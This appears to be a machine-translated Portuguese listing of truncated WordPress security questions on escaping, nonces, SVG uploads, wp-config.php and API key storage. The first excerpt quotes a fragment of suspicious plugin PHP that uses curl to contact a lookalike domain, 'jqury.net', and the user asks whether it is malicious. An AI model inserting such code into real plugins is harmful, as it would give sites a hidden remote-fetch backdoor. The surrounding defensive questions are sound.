Encontrei isso em um plugin. O que isso faz? é perigoso? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");...
A manutenção wp-admin/install.phpe wp-admin/install-helper.phpum vazamento de segurança nas versões mais recentes do wordpress? Por padrão, a permissão de arquivo nesses arquivos é 644. Se houver algum vazamento, que tipo de
Atualmente, essa questão não se encaixa no nosso formato de perguntas e respostas. Esperamos que as respostas sejam apoiadas por fatos, referências ou conhecimentos, mas essa pergunta provavelmente solicitará debates, argumentos, pesquisas ou discussões prolongadas. Se você acha que...
Eu tinha olhado para o código, mas não consegui ver nenhum escape de funções como the_title the_content the_excerptetc. Talvez eu não esteja lendo direito. Preciso escapar dessas funções no desenvolvimento de temas como: esc_html ( the_title () ) Editar: conforme indicado nas respostas abaixo, o...
Vejo que os SVGs são bloqueados por padrão no carregador de mídia e você deve adicioná-lo como um tipo MIME suportado em functions.php. Que razões de segurança estão por trás
Estamos tendo alguns problemas com um desenvolvedor externo. Queremos limitar o acesso ao wp-adminsite apenas ao acesso interno (via VPN ). Simplesmente para que não seja atacado por usuários externos. Podemos enumerar os administradores do site e não queremos que eles sejam fraudados. Nosso...
Configurar o WordPress para atualizar dentro do aplicativo (ou seja, WordPress) é ideal para mim devido à sua conveniência. No entanto, estou preocupado com os requisitos. Os campos solicitados que aparecem após a instalação do ssh2 para php solicitam não apenas minha chave pública, mas também...
Observando o Codex para wp_insert_post (), ele afirma que esta função "... higieniza variáveis, faz algumas verificações, preenche variáveis ausentes como data / hora etc." (EDIT: Atualizei a entrada do Codex para incluir um exemplo mais robusto que inclui segurança, além de atribuição de meta e...
Apenas uma pergunta rápida que pode ajudar um pouco com a segurança. Notei que o arquivo readme.html tem o número da versão listado. Ele reaparece após cada atualização e o licence.txt e wp-config-sample.php. Existe uma maneira fácil de o WordPress remover automaticamente esses arquivos após uma...
Essa coisa dificulta minha codificação. O codex do Wordpress justifica o uso do esc_url falando vagamente sobre segurança. Mas vale realmente a pena? Por exemplo, qual é o importante e prático benefício de segurança usando <?php echo esc_url( home_url( '/' ) ); ?> ao invés de <?php...
Situação inicial Para um site que estou configurando, eu estava analisando todo o campo de segurança de uploads / downloads e restringindo o acesso a eles com base nas funções / capacidades do usuário. Claro que li algumas das perguntas anteriores relacionadas ao tópico (geral) aqui, por razões de...
Parece que eles fazem quase o mesmo tipo de trabalho. Assim... Quando devo usar em esc_html()vez de
Estou tentando proteger meu blog wordpress. Eu li algumas postagens na web que eu deveria mudar table_prefixe ocultar wp-config.php. No entanto, eu não entendi? O que um atacante poderia fazer com o meu wp-config.php? Quero dizer, existem minhas configurações de banco de dados, mas o invasor...
Estou procurando usar algumas APIs e muitas vêm com chaves, chaves secretas e senhas necessárias para funcionar. Onde no WordPress você pode armazenar essas informações? Supondo que alguém possa invadir seu banco de dados, existe alguma maneira de o WordPress tornar a salvaguarda dessas informações...
Esta é provavelmente uma pergunta noob, mas ouça - não é o ponto de usar o Nonce para se proteger de coisas como scrappers (phpcurl scrappers etc.)? Mas o meu Nonce imprime no cabeçalho do documento assim: /* <![CDATA[ */ var nc_ajax_getpost = { ...stuff... getpostNonce: "8a3318a44c" }; /*...
Estive revisando muitas informações sobre a segurança de plug-ins e temas WP e entendi o conceito de que você deve escapar de atributos e valores HTML em temas e plug-ins. Eu já vi bloginfo()e echo get_bloginfo()usei padrão e dentro de uma função esc_html()ou esc_attr(). Gênesis e _s , o tema base...
Quero filtrar qualquer URI de solicitação HTTP feito por meio da API HTTP. Casos de uso: A verificação de atualização do WordPress vai para http://api.wordpress.org/core/version-check/1.6/ , mas https://api.wordpress.org/core/version-check/1.6/ também funciona, e eu quero para usar isso...
Eu li muitos artigos do blog WordPress Security, em que os especialistas em segurança recomendam algumas etapas especiais para cuidar quando alguém se preocupa com a segurança do site WordPress. Uma delas é: Dicas de segurança do WordPress: remova plugins desnecessários que não estão em...
Acabei de publicar um novo plugin: No More Senhas No momento, tenho a tag beta porque o login em uma plataforma é um problema delicado e não quero liberar algo que possa ter falhas de segurança. Então aqui está a minha consulta: É seguro? Fiz o seguinte para garantir a segurança: Nome de...
Acabei de executar o WP no meu próprio servidor. Não estou tentando bloquear mais as coisas. Quais permissões o usuário do banco de dados deve ter no meu banco de dados do